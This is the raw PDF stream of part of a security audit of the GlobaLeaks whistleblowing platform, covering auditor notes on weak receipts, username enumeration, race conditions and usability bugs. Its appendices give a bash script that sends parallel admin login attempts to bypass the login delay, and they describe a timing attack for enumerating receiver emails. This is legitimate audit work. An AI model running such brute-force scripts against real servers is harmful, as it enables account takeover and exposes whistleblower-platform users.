This was probably done so they can put an index) Tj T* 0 Tw (on the table column, but does make reversing the hashes easier \(instant with a 2^34 lookup table\).) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .962651 Tw (Even if they intend to take advantage of indexing and sacrifice offline attack resistance, we should) Tj T* 0 Tw (find out if they explicitly document the tradeoff, and if not suggest they do so.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 456.0236 cm Q q 1 0 0 1 62.69291 432.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 3.276136 Tw 12 TL /F1 10 Tf 0 0 0 rg (There's a ) Tj /F4 10 Tf (CAPTCHA ) Tj /F1 10 Tf (feature for DoS/spam mitigation, might be crackable because of a bad) Tj T* 0 Tw (implementation or the images not being good enough.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 426.0236 cm Q q 1 0 0 1 62.69291 402.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 1.840751 Tw 12 TL /F1 10 Tf 0 0 0 rg (Make sure the security properties the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (developers expect Tor to provide are actually) Tj T* 0 Tw (provided \(confidentiality? authentication? forward secrecy?\).) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 396.0236 cm Q q 1 0 0 1 62.69291 192.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 189 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 177 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.618735 Tw (The receipt is implemented by finding a random string that matches a regexp. By default, it's 10) Tj T* 0 Tw (random digits. 
Problems:) Tj T* ET Q Q q 1 0 0 1 23 171 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 168 cm Q q 1 0 0 1 20 168 cm Q q 1 0 0 1 20 120 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm .35152 Tw 12 TL /F1 10 Tf 0 0 0 rg (10 digits probably isn't long enough \(especially when you consider birthday attacks\). In the) Tj T* 0 Tw 2.445366 Tw /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (docs, the authors justify 10 digits because it's like a phone number, and) Tj T* 0 Tw .269147 Tw (provides plausible deniability \(it doesn't, really, because what are the chances your friend's) Tj T* 0 Tw (phone number is the same as your ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (receipt?\).) Tj T* ET Q Q q Q Q q 1 0 0 1 20 114 cm Q q 1 0 0 1 20 0 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 99 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 63 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 2.211235 Tw (The reverse regex code is very confusing to audit. It may be better to use a random) Tj T* 0 Tw .114597 Tw (20-character ASCII string or something... letting the admin change the regex is error prone.) Tj T* 0 Tw 1.197045 Tw (How does it behave when you set the regex to one that only matches one string, or the) Tj T* 0 Tw (empty set?) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 50 Tm /F1 10 Tf 12 TL 1.004147 Tw (Difficulty to audit, potential for operator misconfiguration, and difficulty to analyze / model) Tj T* 0 Tw 1.19748 Tw ("plausible deniability" all count against this feature. The benefits include that an operator) Tj T* 0 Tw .54284 Tw (may know the target WB population and know how to do plausible deniability well... \(Even) Tj T* 0 Tw 1.72436 Tw (then, will a regex suffice? 
What if instead I want to select a sequence of football team) Tj T* 0 Tw (names?\)) Tj T* ET Q Q q Q Q q 1 0 0 1 20 0 cm Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 186.0236 cm Q q 1 0 0 1 62.69291 78.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 93 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 81 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .753516 Tw (Docs say there is a time delay between a Tip being submitted and the receiver\(s\) being notified. Is) Tj T* 0 Tw (this necessary? Does it help?) Tj T* ET Q Q q 1 0 0 1 23 27 cm q 0 0 0 rg BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL .526988 Tw (It could help if an attacker can see traffic to and from a Node, but not Node contents. Imagine if the) Tj T* 0 Tw 1.357984 Tw (delay notification rule were: "Wait until there are 1000 submissions, then pick one at random and) Tj T* 0 Tw .416651 Tw (send its notifications." Then there's an anonymity set that evolves with submissions over time and is) Tj T* 0 Tw (somewhat easy to reason about.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.076651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Anonymity specialists could say much more about this, and they could help by asking the right) Tj T* 0 Tw (questions, which would then let ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (/LA figure out "does it help".) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 76.86614 cm Q endstream endobj % 'R386': class PDFStream 386 0 obj % page stream << /Length 10836 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 741.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .927318 Tw 12 TL /F1 10 Tf 0 0 0 rg (Interesting, but probably out of scope problem: How to notify past whistleblowers that they may be) Tj T* 0 Tw (compromised after a security bug in ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (is found?) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 735.0236 cm Q q 1 0 0 1 62.69291 723.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Does password change invalidate existing sessions for that user?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 717.0236 cm Q q 1 0 0 1 62.69291 693.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .710542 Tw (What can a WB do if they suspect their receipt is compromised, but not yet taken advantage of, by) Tj T* 0 Tw (an attacker? Can they invalidate it quickly?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 687.0236 cm Q q 1 0 0 1 62.69291 675.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Concurrent requests / race condition issues?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 669.0236 cm Q q 1 0 0 1 62.69291 645.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .10686 Tw 12 TL /F1 10 Tf 0 0 0 rg (WB should always be using private browsing mode, or at least clear their history. Do the ) Tj /F4 10 Tf (GlobaLeaks) Tj T* 0 Tw /F1 10 Tf (docs / warnings make this clear?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 639.0236 cm Q q 1 0 0 1 62.69291 513.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 111 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 86 Tm 1.195697 Tw 12 TL /F1 10 Tf 0 0 0 rg (The backend code uses both Twisted and threads. 
\(Source: grepping for 'thread'.\) Do the threads) Tj T* 0 Tw 1.763314 Tw (break the nice reasoning-about-concurrency that Twisted offers? \(If so, Taylor may have already) Tj T* 0 Tw 1.459147 Tw (found races in ) Tj /F3 10 Tf (authentication.py) Tj /F1 10 Tf (; if not, add a commendation for excluding race conditions.\)) Tj T* 0 Tw 1.708735 Tw (Nathan added: "I can't remember if its ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (or ) Tj /F4 10 Tf (Ooni ) Tj /F1 10 Tf (which uses twisted, but then adds a) Tj T* 0 Tw 1.616905 Tw (dependency which is a multithreaded "task scheduler". So we need to scan the dependencies...") Tj T* 0 Tw .854987 Tw (Also there may be threads hiding places you can't find by grep for 'thread.' It might be worth doing) Tj T* 0 Tw .88936 Tw (some runtime measure of that, i.e. look at the process table while it's running, or monkeypatch the) Tj T* 0 Tw (Python standard library's thread-spawner to debug-print...) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .009213 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (settings.py ) Tj /F1 10 Tf (there is ) Tj /F3 10 Tf (self.db_thread_pool_size) Tj ( ) Tj (=) Tj ( ) Tj (1) Tj /F1 10 Tf (... not sure what it does. This setting) Tj T* 0 Tw (is used in ) Tj /F3 10 Tf (transact ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (settings.py) Tj /F1 10 Tf (, which is "for managing transactions.") Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 507.0236 cm Q q 1 0 0 1 62.69291 459.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm 1.53248 Tw 12 TL /F1 10 Tf 0 0 0 rg (Username enumeration \(or username guess checking\) may be more severe for ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (than) Tj T* 0 Tw .929984 Tw (other web applications, since the receivers log in with their email address, which could reveal their) Tj T* 0 Tw 1.83498 Tw (identity even when email notifications are disabled. 
Check what ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf ('s threat model says) Tj T* 0 Tw (about this. It probably excludes it since receivers are not supposed to be anonymous.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 453.0236 cm Q q 1 0 0 1 62.69291 441.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (What are all the ) Tj /F3 10 Tf (Random.atfork\(\) ) Tj /F1 10 Tf (calls for? Where are the ) Tj /F3 10 Tf (fork\(\)) Tj /F1 10 Tf (?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 435.0236 cm Q q 1 0 0 1 62.69291 399.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.29561 Tw (Whistleblowers can log in with the username "wb" and the receipt as their password. Can this be) Tj T* 0 Tw 2.189985 Tw (exploited to give the WB receiver-like authority? Darius notes that when a WB logs out due to) Tj T* 0 Tw (session expiry, they are taken to the admin/receiver login page.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 393.0236 cm Q q 1 0 0 1 62.69291 369.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.702485 Tw (Passwords are sent to the server, then hashed. Why not have the JS client hash passwords? It) Tj T* 0 Tw (seems better to never let the server see the passwords, but is there any well-defined benefit?) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 363.0236 cm Q q 1 0 0 1 62.69291 297.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 51 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 39 cm q BT 1 0 0 1 0 14 Tm .786235 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj 0 0 .501961 rg (GLI604) Tj 0 0 0 rg (, there is a comment "this fallback has been implemented because lose the data is worst) Tj T* 0 Tw (than keep data unsafe for a short amount of time." Daira makes a really good point:) Tj T* ET Q Q q 1 0 0 1 23 33 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.335488 Tw (This is a worrying point of view, because it fails to take account of the fact that if an error is) Tj T* 0 Tw .099431 Tw (reported, it's more likely to be fixed for future uses whereas if it silently fails unsafe, then it's very) Tj T* 0 Tw (likely to continue to silently fail unsafe indefinitely.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 291.0236 cm Q q 1 0 0 1 62.69291 279.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (The Users Overview doesn't show Admin activity, does it? Should it?) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 273.0236 cm Q q 1 0 0 1 62.69291 76.86614 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 181.1575 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 181.1575 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (There are usability issues that aren't obviously vulnerabilities, noted for followup:) Tj T* ET Q Q q 1 0 0 1 23 175.1575 cm Q q 1 0 0 1 23 13.15748 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 156 cm Q q 1 0 0 1 20 156 cm Q q 1 0 0 1 20 120 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .193318 Tw (As a receiver, I update my preferences to disable encryption, hit the update button to save) Tj T* 0 Tw .36152 Tw (the change: the page says "Success! Updated your preferences" but reverts them back to) Tj T* 0 Tw (enabled.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 114 cm Q q 1 0 0 1 20 90 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 3.06784 Tw (As a new whistleblower on the demo page, having read only minimal docs on the) Tj T* 0 Tw (GlobaLeaks site, it was unclear to me who might read my submission.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 84 cm Q q 1 0 0 1 20 48 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.503735 Tw (Tried submitting a tip. At first the Receiver Selection had no receivers, so I went on to) Tj T* 0 Tw .009318 Tw (entering details and uploading a file. Back to Receivers, and now I could select them. Back) Tj T* 0 Tw (to the submission details, and they're gone! 
And the submit button is no longer active.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 42 cm Q q 1 0 0 1 20 18 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.50284 Tw (In Receiver login, you are prompted for a username but what's actually wanted is your) Tj T* 0 Tw (email address.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 12 cm Q q 1 0 0 1 20 -12 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL 1.172927 Tw (The 'Danger!' banner at the top has an X at top-right that's an affordance to make it go) Tj T* 0 Tw (away, except it doesn't go away. The X should not exist.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 0 cm Q q Q Q q Q Q endstream endobj % 'R387': class PDFStream 387 0 obj % page stream << /Length 3348 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 537.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 215 Tm T* ET q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 42 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 171 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 123 cm q 0 0 0 rg BT 1 0 0 1 0 50 Tm /F1 10 Tf 12 TL 4.372976 Tw (After the Node server stops \(or, presumably, becomes unreachable\), the frontend) Tj T* 0 Tw 2.135984 Tw (continues to run without clearly failing. For example, I had an admin page open for a) Tj T* 0 Tw 1.01784 Tw (stopped server; I added a profile picture for a receiver, and apparently succeeded, until I) Tj T* 0 Tw 1.728651 Tw (clicked again on the receiver and found its picture still unset. There had been no error) Tj T* 0 Tw (message. 
\(Note that an attacker could cause a network partition.\)) Tj T* ET Q Q q 1 0 0 1 23 117 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 114 cm Q q 1 0 0 1 20 114 cm Q q 1 0 0 1 20 30 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 69 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 74 Tm .783828 Tw 12 TL /F1 10 Tf 0 0 0 rg (This kind of an issue can sometimes be turned into an attack. See ) Tj 0 0 .501961 rg (TLSTRUNC) Tj 0 0 0 rg (.) Tj T* 0 Tw 3.708863 Tw (For example, in ) Tj /F3 10 Tf (app/scripts/services.js) Tj /F1 10 Tf (, it looks like the logout will) Tj T* 0 Tw .053059 Tw (appear to the user to have worked, even if the request to DELETE /authentication) Tj T* 0 Tw .232976 Tw (is dropped, because ) Tj /F3 10 Tf (logout_performed\(\) ) Tj /F1 10 Tf (is called in the success and failure) Tj T* 0 Tw 3.745814 Tw (cases. The user will believe they are logged out when they really aren't.) Tj T* 0 Tw 1.212706 Tw /F3 10 Tf (logout_performed\(\) ) Tj /F1 10 Tf (should be named something else if it is also called for) Tj T* 0 Tw (the failure case.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 24 cm Q q 1 0 0 1 20 0 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .676905 Tw (Keep an eye out for anywhere it's just assuming a request goes through without) Tj T* 0 Tw (error, or where one request depends on a previous one working.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 20 0 cm Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 20 36 cm Q q 1 0 0 1 20 0 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.217633 Tw 12 TL /F1 10 Tf 0 0 0 rg (As a WB connecting without Tor to a Node configured not to accept me, I see "You are) Tj T* 0 Tw 3.770888 Tw (connecting to the Node not anonymously and this Node only supports anonymous) Tj T* 0 Tw (submissions". No indication what I should do next.) Tj T* ET Q Q q Q Q q 1 0 0 1 20 0 cm Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 537.0236 cm Q q 1 0 0 1 62.69291 537.0236 cm Q endstream endobj % 'R388': class PDFStream 388 0 obj % page stream << /Length 1952 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix C. Script for Issue E) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 14 Tm .571412 Tw 12 TL /F1 10 Tf 0 0 0 rg (The following script demonstrates how the exponential login delay can be bypassed by sending requests) Tj T* 0 Tw (in parallel. This is discussed in ) Tj 0 0 .501961 rg (Issue E. Parallel Requests Bypass Exponentially Increasing Login Delay) Tj 0 0 0 rg (.) Tj T* ET Q Q q 1 0 0 1 62.69291 708.0236 cm Q q 1 0 0 1 62.69291 508.5977 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 0 2 Tm T* ET q 1 0 0 1 20 0 cm q q .787622 0 0 .787622 0 0 cm q 1 0 0 1 6.6 8.379653 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 570 252 re B* Q q BT 1 0 0 1 0 230 Tm 12 TL /F3 10 Tf 0 0 0 rg (#!/bin/bash) Tj T* (server=192.168.1.72:8082 # Your GLBackend server) Tj T* (xsrf='4735a6b2c29349368cae50ea0e39c84e' # XSRF-TOKEN from sniffing HTTP with the server.) 
Tj T* (logfile=brute) Tj T* (password=oops # 'globaleaks' if you want to succeed) Tj T* T* (for trial in {00..99}; do) Tj T* ( \() Tj T* ( echo "Start at `date -u '+%s'` seconds") Tj T* ( curl -i \\) Tj T* ( -H 'Accept: application/json, text/plain, */*' \\) Tj T* ( -H 'Content-Type: application/json;charset=UTF-8' \\) Tj T* ( -H "X-XSRF-TOKEN: $xsrf" \\) Tj T* ( -H "Cookie: XSRF-TOKEN=$xsrf" \\) Tj T* ( -d '{"username":"admin","password":"'$password'","role":"admin"}' \\) Tj T* ( $server/authentication 2) Tj (>) Tj (/dev/null) Tj T* ( echo) Tj T* ( echo "Done at `date -u '+%s'` seconds") Tj T* ( \) ) Tj (>) Tj ($logfile-$trial ) Tj (&) Tj T* (done) Tj T* ET Q Q Q Q Q q Q Q q 1 0 0 1 62.69291 508.5977 cm Q q 1 0 0 1 62.69291 508.5977 cm Q endstream endobj % 'R389': class PDFStream 389 0 obj % page stream << /Length 3881 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix D. Side-Channel Attack Proof of Concept) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .795984 Tw (We performed an informal \(non-scientific\) experiment to get a sense for how feasible timing attacks are.) Tj T* 0 Tw .452485 Tw (The following script attempts to log in with an invalid username and password and measures the server's) Tj T* 0 Tw (response time. It can be used to tell if an email address is associated with a receiver account or not.) Tj T* ET Q Q q 1 0 0 1 62.69291 672.0236 cm q BT 1 0 0 1 0 14 Tm 2.741163 Tw 12 TL /F1 10 Tf 0 0 0 rg (In order to perform the experiment, we disabled the login delay by adding ) Tj /F3 10 Tf (timeout) Tj ( ) Tj (=) Tj ( ) Tj (0 ) Tj /F1 10 Tf (to the) Tj T* 0 Tw /F3 10 Tf (security_sleep\(\) ) Tj /F1 10 Tf (method in the source code, since it interferes with the attack.) Tj T* ET Q Q q 1 0 0 1 62.69291 630.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .341163 Tw (The experiment was repeated 6 times. 
The first three runs were done using a valid account email against) Tj T* 0 Tw 1.02186 Tw (an invalid control email. The last three runs were done using one invalid account email against another) Tj T* 0 Tw (invalid account email.) Tj T* ET Q Q q 1 0 0 1 62.69291 600.0236 cm q BT 1 0 0 1 0 14 Tm 2.042126 Tw 12 TL /F1 10 Tf 0 0 0 rg (Tests were performed over a local \(loopback\) connection between the host system and a ) Tj /F4 10 Tf (VirtualBox) Tj T* 0 Tw /F1 10 Tf (virtual machine running ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (. The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (server was restarted between each test.) Tj T* ET Q Q q 1 0 0 1 62.69291 546.0236 cm q BT 1 0 0 1 0 38 Tm 1.810574 Tw 12 TL /F1 10 Tf 0 0 0 rg (Note that this experimental setup does not account for latency introduced by the Internet or Tor, and it is) Tj T* 0 Tw .458651 Tw (unreasonable to assume the attacker can restart the server between each of their tests. Therefore, these) Tj T* 0 Tw 2.274651 Tw (results only demonstrate the ) Tj /F4 10 Tf (existence ) Tj /F1 10 Tf (of a timing variation, and say nothing about the feasibility of) Tj T* 0 Tw (exploiting it in the real world.) Tj T* ET Q Q q 1 0 0 1 62.69291 528.0236 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Here are the results; the time difference is clear:) Tj T* ET Q Q q 1 0 0 1 62.69291 170.8236 cm q q 1 0 0 1 0 0 cm q 1 0 0 1 6.6 6.6 cm q .662745 .662745 .662745 RG .5 w .960784 .960784 .862745 rg n -6 -6 468.6898 348 re B* Q q 0 0 0 rg BT 1 0 0 1 0 326 Tm /F3 10 Tf 12 TL (Valid Email \(havoc@defuse.ca\) vs. 
